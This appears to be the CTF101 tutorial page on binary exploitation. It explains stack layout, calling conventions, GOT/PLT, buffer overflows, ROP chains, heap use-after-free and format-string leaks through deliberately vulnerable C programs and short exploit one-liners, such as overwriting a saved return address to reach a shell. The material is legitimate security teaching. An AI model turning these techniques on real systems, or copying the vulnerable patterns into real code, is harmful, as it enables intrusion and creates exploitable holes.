Binary Exploitation

https://ctf101.org/binary-exploitation/overview/

Binaries, or executables, are machine codes for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional Windows executable. Binary Exploitation is a broad topic within Cyber Security that really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program's functions.

Common topics addressed by Binary Exploitation or 'pwn' challenges include:

Registers
The Stack
Calling Conventions
Global Offset Table (GOT)
Buffers
Buffer Overflow
Return Oriented Programming (ROP)
Binary Security
No eXecute (NX)
Address Space Layout Randomization (ASLR)
Stack Canaries
Relocation Read-Only (RELRO)
The Heap
Heap Exploitation
Format String Vulnerability

Registers

A register is a location within the processor that is able to store data, much like RAM. Unlike RAM, however, accesses to registers are effectively instantaneous, whereas reads from main memory can take hundreds of CPU cycles to return.

Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not "general purpose registers" (GPRs). On x86, the only 2 reserved registers are rip and rsp which hold the address of the next instruction to execute and the address of the stack respectively.

On x86, the same register can have different-sized accesses for backward compatibility. For example, the rax register is the full 64-bit register, eax is the low 32 bits of rax, ax is the low 16 bits, al is the low 8 bits, and ah is the high 8 bits of ax (bits 8-16 of rax).

The Stack

In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).

In x86, the stack is simply an area in RAM that was chosen to be the stack - there is no special hardware to store stack contents. The esp/rsp register holds the address in memory where the bottom of the stack resides. When something is pushed to the stack, esp decrements by 4 (or 8 on 64-bit x86), and the value that was pushed is stored at that location in memory. Likewise, when a pop instruction is executed, the value at esp is retrieved (i.e. esp is dereferenced), and esp is then incremented by 4 (or 8).

N.B. The stack "grows" down to lower memory addresses!

Conventionally, ebp/rbp contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp rather than an offset to esp. A stack frame is essentially just the space used on the stack by a given function.

Uses

The stack is primarily used for a few things:

Storing function arguments
Storing local variables
Storing processor state between function calls

Example

Let's see what the stack looks like right after say_hi has been called in this 32-bit x86 C program:

#include <stdio.h>

void say_hi(const char * name) {
    printf("Hello %s!\n", name);
}

int main(int argc, char ** argv) {
    char * name;
    if (argc != 2) {
        return 1;
    }
    name = argv[1];
    say_hi(name);
    return 0;
}

And the relevant assembly:

0804840b <say_hi>:
 804840b:   55                      push   ebp
 804840c:   89 e5                   mov    ebp,esp
 804840e:   83 ec 08                sub    esp,0x8
 8048411:   83 ec 08                sub    esp,0x8
 8048414:   ff 75 08                push   DWORD PTR [ebp+0x8]
 8048417:   68 f0 84 04 08          push   0x80484f0
 804841c:   e8 bf fe ff ff          call   80482e0 <printf@plt>
 8048421:   83 c4 10                add    esp,0x10
 8048424:   90                      nop
 8048425:   c9                      leave
 8048426:   c3                      ret

08048427 <main>:
 8048427:   8d 4c 24 04             lea    ecx,[esp+0x4]
 804842b:   83 e4 f0                and    esp,0xfffffff0
 804842e:   ff 71 fc                push   DWORD PTR [ecx-0x4]
 8048431:   55                      push   ebp
 8048432:   89 e5                   mov    ebp,esp
 8048434:   51                      push   ecx
 8048435:   83 ec 14                sub    esp,0x14
 8048438:   89 c8                   mov    eax,ecx
 804843a:   83 38 02                cmp    DWORD PTR [eax],0x2
 804843d:   74 07                   je     8048446 <main+0x1f>
 804843f:   b8 01 00 00 00          mov    eax,0x1
 8048444:   eb 1c                   jmp    8048462 <main+0x3b>
 8048446:   8b 40 04                mov    eax,DWORD PTR [eax+0x4]
 8048449:   8b 40 04                mov    eax,DWORD PTR [eax+0x4]
 804844c:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax
 804844f:   83 ec 0c                sub    esp,0xc
 8048452:   ff 75 f4                push   DWORD PTR [ebp-0xc]
 8048455:   e8 b1 ff ff ff          call   804840b <say_hi>
 804845a:   83 c4 10                add    esp,0x10
 804845d:   b8 00 00 00 00          mov    eax,0x0
 8048462:   8b 4d fc                mov    ecx,DWORD PTR [ebp-0x4]
 8048465:   c9                      leave
 8048466:   8d 61 fc                lea    esp,[ecx-0x4]
 8048469:   c3                      ret

Skipping over the bulk of main, you'll see that at 0x8048452 main's name local is pushed to the stack because it's the first argument to say_hi. Then, a call instruction is executed. call instructions first push the current instruction pointer to the stack, then jump to their destination. So when the processor begins executing say_hi at 0x0804840b, the stack looks like this:

EIP = 0x0804840b (push ebp)
ESP = 0xffff0000
EBP = 0xffff002c

        0xffff0004: 0xffffa0a0              // say_hi argument 1
ESP ->  0xffff0000: 0x0804845a              // Return address for say_hi

The first thing say_hi does is save the current ebp so that when it returns, ebp is back where main expects it to be. The stack now looks like this:

EIP = 0x0804840c (mov ebp, esp)
ESP = 0xfffefffc
EBP = 0xffff002c

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
ESP ->  0xfffefffc: 0xffff002c              // Saved EBP

Again, note how esp gets smaller when values are pushed to the stack.

Next, the current esp is saved into ebp, marking the top of the new stack frame.

EIP = 0x0804840e (sub esp, 0x8)
ESP = 0xfffefffc
EBP = 0xfffefffc

            0xffff0004: 0xffffa0a0              // say_hi argument 1
            0xffff0000: 0x0804845a              // Return address for say_hi
ESP, EBP -> 0xfffefffc: 0xffff002c              // Saved EBP

Then, the stack is "grown" to accommodate local variables inside say_hi.

EIP = 0x08048414 (push [ebp + 0x8])
ESP = 0xfffeffec
EBP = 0xfffefffc

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
EBP ->  0xfffefffc: 0xffff002c              // Saved EBP
        0xfffefff8: UNDEFINED
        0xfffefff4: UNDEFINED
        0xfffefff0: UNDEFINED
ESP ->  0xfffefffc: UNDEFINED

NOTE: stack space is not implicitly cleared!

Now, the 2 arguments to printf are pushed in reverse order.

EIP = 0x0804841c (call printf@plt)
ESP = 0xfffeffe4
EBP = 0xfffefffc

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
EBP ->  0xfffefffc: 0xffff002c              // Saved EBP
        0xfffefff8: UNDEFINED
        0xfffefff4: UNDEFINED
        0xfffefff0: UNDEFINED
        0xfffeffec: UNDEFINED
        0xfffeffe8: 0xffffa0a0              // printf argument 2
ESP ->  0xfffeffe4: 0x080484f0              // printf argument 1

Finally, printf is called, which pushes the address of the next instruction to execute.

EIP = 0x080482e0
ESP = 0xfffeffe4
EBP = 0xfffefffc

        0xffff0004: 0xffffa0a0              // say_hi argument 1
        0xffff0000: 0x0804845a              // Return address for say_hi
EBP ->  0xfffefffc: 0xffff002c              // Saved EBP
        0xfffefff8: UNDEFINED
        0xfffefff4: UNDEFINED
        0xfffefff0: UNDEFINED
        0xfffeffec: UNDEFINED
        0xfffeffe8: 0xffffa0a0              // printf argument 2
        0xfffeffe4: 0x080484f0              // printf argument 1
ESP ->  0xfffeffe0: 0x08048421              // Return address for printf

Once printf has returned, the leave instruction moves ebp into esp, and pops the saved EBP.

EIP = 0x08048426 (ret)
ESP = 0xfffefffc
EBP = 0xffff002c

        0xffff0004: 0xffffa0a0              // say_hi argument 1
ESP ->  0xffff0000: 0x0804845a              // Return address for say_hi

And finally, ret pops the saved instruction pointer into eip which causes the program to return to main with the same esp, ebp, and stack contents as when say_hi was initially called.

EIP = 0x0804845a (add esp, 0x10)
ESP = 0xffff0000
EBP = 0xffff002c

ESP ->  0xffff0004: 0xffffa0a0              // say_hi argument 1

Calling Conventions

To be able to call functions, there needs to be an agreed-upon way to pass arguments. If a program is entirely self-contained in a binary, the compiler would be free to decide the calling convention. However, in reality, shared libraries are used so that common code (e.g. libc) can be stored once and dynamically linked into programs that need it, reducing program size.

In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit

cdecl

In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:

int add(int a, int b, int c) {
    return a + b + c;
}

would be invoked by pushing c, then b, then a.

SysV

For 64-bit binaries, function arguments are first passed in certain registers:

RDI
RSI
RDX
RCX
R8
R9

then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.

Other Conventions

Any method of passing arguments could be used as long as the compiler is aware of what the convention is. As a result, there have been many calling conventions in the past that aren't used frequently anymore. See Wikipedia for a comprehensive list.

GOT

The Global Offset Table (or GOT) is a section inside of programs that hold addresses of functions that are dynamically linked. As mentioned in the page on calling conventions, most programs don't include every function they use to reduce binary size. Instead, common functions (like those in libc) are "linked" into the program so they can be saved once on disk and reused by every program.

Unless a program is marked full RELRO, the resolution of the function to address in a dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however, functions are not mapped to their actual code until they're first called. For example, in the following C snippet puts won't be resolved to an address in libc until after it has been called once:

int main() {
    puts("Hi there!");
    puts("Ok bye now.");
    return 0;
}

To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls "short circuit" straight to their implementation bypassing the dynamic resolver.

This has two important implications:

The GOT contains pointers to libraries which move around due to ASLR
The GOT is writable

These two facts will become very useful to use in Return Oriented Programming

PLT

Before the address of a function has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small "stub" function that is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.

Buffers

A buffer is any allocated space in memory where data (often user input) can be stored. For example, in the following C program name would be considered a stack buffer:

#include <stdio.h>

int main() {
    char name[64] = {0};
    read(0, name, 63);
    printf("Hello %s", name);
    return 0;
}

Buffers could also be global variables:

#include <stdio.h>

char name[64] = {0};

int main() {
    read(0, name, 63);
    printf("Hello %s", name);
    return 0;
}

Or dynamically allocated on the heap:

#include <stdio.h>
#include <stdlib.h>

int main() {
    char *name = malloc(64);
    memset(name, 0, 64);
    read(0, name, 63);
    printf("Hello %s", name);
    return 0;
}

Exploits

Given that buffers commonly hold user input, mistakes when writing to them could result in attacker-controlled data being written outside of the buffer's space. See the page on buffer overflows for more.

Buffer Overflow

A Buffer Overflow is a vulnerability in which data can be written that exceeds the allocated space, allowing an attacker to overwrite other data.

Stack buffer overflow

The simplest and most common buffer overflow is one where the buffer is on the stack. Let's look at an example.

#include <stdio.h>

int main() {
    int secret = 0xdeadbeef;
    char name[100] = {0};
    read(0, name, 0x100);
    if (secret == 0x1337) {
        puts("Wow! Here's a secret.");
    } else {
        puts("I guess you're not cool enough to see my secret");
    }
}

There's a tiny mistake in this program which will allow us to see the secret. name is decimal 100 bytes, however, we're reading in hex 100 bytes (=256 decimal bytes)! Let's see how we can use this to our advantage.

If the compiler chose to layout the stack like this:

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0xdeadbeef  // secret
...
        0xffff0004: 0x0
ESP ->  0xffff0000: 0x0         // name

let's look at what happens when we read in 0x100 bytes of 'A's.

The first decimal 100 bytes are saved properly:

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0xdeadbeef  // secret
...
        0xffff0004: 0x41414141
ESP ->  0xffff0000: 0x41414141  // name

However, when the 101st byte is read in, we see an issue:

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0xdeadbe41  // secret
...
        0xffff0004: 0x41414141
ESP ->  0xffff0000: 0x41414141  // name

The least significant byte of the secret has been overwritten! If we follow the next 3 bytes to be read in, we'll see the entirety of the secret is "clobbered" with our 'A's

        0xffff006c: 0xf7f7f7f7  // Saved EIP
        0xffff0068: 0xffff0100  // Saved EBP
        0xffff0064: 0x41414141  // secret
...
        0xffff0004: 0x41414141
ESP ->  0xffff0000: 0x41414141  // name

The remaining 152 bytes would continue clobbering values up the stack.

Passing an impossible check

How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite the secret happen to be the bytes that represent 0x1337 in Little Endian, we'll see the secret message.

A small Python one-liner will work nicely: python -c "print 'A'*100 + '\x31\x13\x00\x00'"

This will fill the name buffer with 100 'A's, then overwrite the secret with the 32-bit little-endian encoding of 0x1337.

Going one step further

As discussed on the stack page, the instruction that the current function should jump to when it is done is also saved on the stack (denoted as "Saved EIP" in the above stack diagrams). If we can overwrite this, we can control where the program jumps after the main finishes running, giving us the ability to control what the program does entirely.

Usually, the end objective in binary exploitation is to get a shell (often called "popping a shell") on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.

Say there happens to be a nice function that does this define somewhere else in the program that we normally can't get to:

void give_shell() {
    system("/bin/sh");
}

Well with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack to the address where give_shell is. Then, when the main returns, it will pop that address off of the stack and jump to it, running give_shell, and giving us our shell.

Assuming give_shell is at 0x08048fd0, we could use something like this: python -c "print 'A'*108 + '\xd0\x8f\x04\x08'"

We send 108 'A's to overwrite the 100 bytes that are allocated for the name, the 4 bytes for secret, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell's address, and we would get a shell!

This idea is extended on in Return Oriented Programming

Return Oriented Programming

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.

As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell function, however, so we need to find a way to manually invoke the system or another exec function to get us our shell.

32 bit

Imagine we have a program similar to the following:

#include <stdio.h>
#include <stdlib.h>

char name[32];

int main() {
    printf("What's your name? ");
    read(0, name, 32);

    printf("Hi %s\n", name);

    printf("The time is currently ");
    system("/bin/date");

    char echo[100];
    printf("What do you want me to echo back? ");
    read(0, echo, 1000);
    puts(echo);

    return 0;
}

We obviously have a stack buffer overflow on the echo variable which can give us EIP control when the main returns. But we don't have a give_shell function! So what can we do?

We can call the system with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.

When the main returns, we want our stack to look like something normally called system. Recall what is on the stack after a function has been called:

        ...                                 // More arguments
        0xffff0008: 0x00000002              // Argument 2
        0xffff0004: 0x00000001              // Argument 1
ESP ->  0xffff0000: 0x080484d0              // Return address

So the main's stack frame needs to look like this:

        0xffff0008: 0xdeadbeef              // system argument 1
        0xffff0004: 0xdeadbeef              // return address for system
ESP ->  0xffff0000: 0x08048450              // return address for main (system's PLT entry)

Then when the main returns, it will jump into the system's PLT entry and the stack will appear just like the system had been called normally for the first time.

Note: we don't care about the return address system will return to because we will have already gotten our shell by then!

Arguments

This is a good start, but we need to pass an argument to the system for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries "move around" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case, however, we have a very convenient name global which will be at a known location in the binary (in the BSS segment).

Putting it together

Our exploit will need to do the following:

Enter "sh" or another command to run as the name
Fill the stack with
Garbage up to the saved EIP
The address of the system's PLT entry
A fake return address for the system to jump to when it's done
The address of the name global acts as the first argument to the system

64 bit

In 64-bit binaries, we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of running the system, this means we will need to find a way to control the RDI register.

To do this, we'll use small snippets of assembly in the binary, called "gadgets." These gadgets usually pop one or more registers off of the stack, and then call ret, which allows us to chain them together by making a large fake call stack.

For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):

0x400c01: pop rdi; ret
0x400c03: pop rsi; pop r15; ret

We can set up a fake call stack with these gadgets to sequentially execute them, poping values we control into registers, and then end with a jump to the system.

Example

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
        0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget
        0xffff0008: 0xdeadbeef          // value to be popped into rdi
RSP ->  0xffff0000: 0x400c01            // address of rdi gadget

Stepping through this one instruction at a time, main returns, jumping to our pop rdi gadget:

RIP = 0x400c01 (pop rdi)
RDI = UNKNOWN
RSI = UNKNOWN

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
        0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget
RSP ->  0xffff0008: 0xdeadbeef          // value to be popped into rdi

pop rdi is then executed, popping the top of the stack into RDI:

RIP = 0x400c02 (ret)
RDI = 0xdeadbeef
RSI = UNKNOWN

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
        0xffff0018: 0x1337beef          // value we want in rsi
RSP ->  0xffff0010: 0x400c03            // address that the rdi gadget's ret will return to - the pop rsi gadget

The RDI gadget then rets into our RSI gadget:

RIP = 0x400c03 (pop rsi)
RDI = 0xdeadbeef
RSI = UNKNOWN

        0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
        0xffff0020: 0x1337beef          // value we want in r15 (probably garbage)
RSP ->  0xffff0018: 0x1337beef          // value we want in rsi

RSI and R15 are popped:

RIP = 0x400c05 (ret)
RDI = 0xdeadbeef
RSI = 0x1337beef

RSP ->  0xffff0028: 0x400d00            // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled

And finally, the RSI gadget rets, jumping to whatever function we want, but now with RDI and RSI set to values we control.

Binary Security

Binary Security is using tools and methods in order to secure programs from being manipulated and exploited. These tools are not infallible, but when used together and implemented properly, they can raise the difficulty of exploitation greatly.

Some methods covered include:

The Heap

A heap is a place in memory that a program can use to dynamically create objects. Creating objects on the heap has some advantages compared to using the stack:

Heap allocations can be dynamically sized
Heap allocations "persist" when a function returns

There are also some disadvantages, however:

Heap allocations can be slower
Heap allocations must be manually cleaned up

Using the heap

In C, there are a number of functions used to interact with the heap, but we're going to focus on the two core ones:

malloc: allocate n bytes on the heap
free: free the given allocation

Let's see how these could be used in a program:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    unsigned alloc_size = 0;
    char *stuff;

    printf("Number of bytes? ");
    scanf("%u", &alloc_size);

    stuff = malloc(alloc_size + 1);
    memset(0, stuff, alloc_size + 1);

    read(0, stuff, alloc_size);

    printf("You wrote: %s", stuff);

    free(stuff);

    return 0;
}

This program reads in a size from the user, creates an allocation of that size on the heap, reads in that many bytes, then prints it back out to the user.

Heap Exploits

Overflow

Much like a stack buffer overflow, a heap overflow is a vulnerability where more data than can fit in the allocated buffer is read in. This could lead to heap metadata corruption, or corruption of other heap objects, which could in turn provide a new attack surface.

Use After Free (UAF)

Once free is called on an allocation, the allocator is free to reallocate that chunk of memory in future calls to malloc if it so chooses. However, if the program author isn't careful and uses the freed object later on, the contents may be corrupt (or even attacker controlled). This is called use after free or UAF.

Example

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

typedef struct string {
    unsigned length;
    char *data;
} string;

int main() {
    struct string* s = malloc(sizeof(string));
    puts("Length:");
    scanf("%u", &s->length);
    s->data = malloc(s->length + 1);
    memset(s->data, 0, s->length + 1);
    puts("Data:");
    read(0, s->data, s->length);

    free(s->data);
    free(s);

    char *s2 = malloc(16);
    memset(s2, 0, 16);
    puts("More data:");
    read(0, s2, 15);

    // Now using s again, a UAF

    puts(s->data);

    return 0;
}

In this example, we have a string structure with a length and a pointer to the actual string data. We properly allocate, fill, and then free an instance of this structure. Then we make another allocation, fill it, and then improperly reference the freed string. Due to how Glibc's allocator works, s2 will actually get the same memory as the original s allocation, which in turn gives us the ability to control the s->data pointer. This could be used to leak program data.

Advanced Heap Exploitation

Not only can the heap be exploited by the data in allocations, but exploits can also use the underlying mechanisms in malloc, free, etc. to exploit a program. This is beyond the scope of CTF 101, but here are a few recommended resources:

Format String Vulnerability

A format string vulnerability is a bug where user input is passed as the format argument to printf, scanf, or another function in that family.

The format argument has many different specifies which could allow an attacker to leak data if they control the format argument to printf. Since printf and similar are variadic functions, they will continue popping data off of the stack according to the format.

For example, if we can make the format argument "%x.%x.%x.%x", printf will pop off four stack values and print them in hexadecimal, potentially leaking sensitive information.

printf can also index to an arbitrary "argument" with the following syntax: "%n$x" (where n is the decimal index of the argument you want).

While these bugs are powerful, they're very rare nowadays, as all modern compilers warn when printf is called with a non-constant string.

Example

#include <stdio.h>
#include <unistd.h>

int main() {
    int secret_num = 0x8badf00d;

    char name[64] = {0};
    read(0, name, 64);
    printf("Hello ");
    printf(name);
    printf("! You'll never get my secret!\n");
    return 0;
}

Due to how GCC decided to lay out the stack, secret_num is actually at a lower address on the stack than name, so we only have to go to the 7th "argument" in printf to leak the secret:

$ ./fmt_string
%7$llx
Hello 8badf00d3ea43eef
! You'll never get my secret!